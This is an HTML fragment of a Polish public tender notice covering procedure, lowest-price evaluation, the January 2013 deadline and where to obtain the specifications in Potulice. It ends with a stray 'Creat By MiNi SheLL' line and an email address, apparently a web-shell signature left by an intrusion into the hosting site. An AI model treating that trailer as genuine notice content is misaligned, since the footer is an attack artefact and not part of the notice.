</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>nie dotyczy</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bigb-baltica.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> BIGB BALTICA ODDZIAŁ POTULICE 
UL.ALEJA PARKOWA 1
89-120 POTULICE.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.01.2013 godzina 12:00, miejsce: BIGB BALTICA ODDZIAŁ POTULICE 
UL.ALEJA PARKOWA 1
89-120 POTULICE
SEKRETARIAT ZAKŁADU KARNEGO W POTULICACH.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> NIE DOTYCZY.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com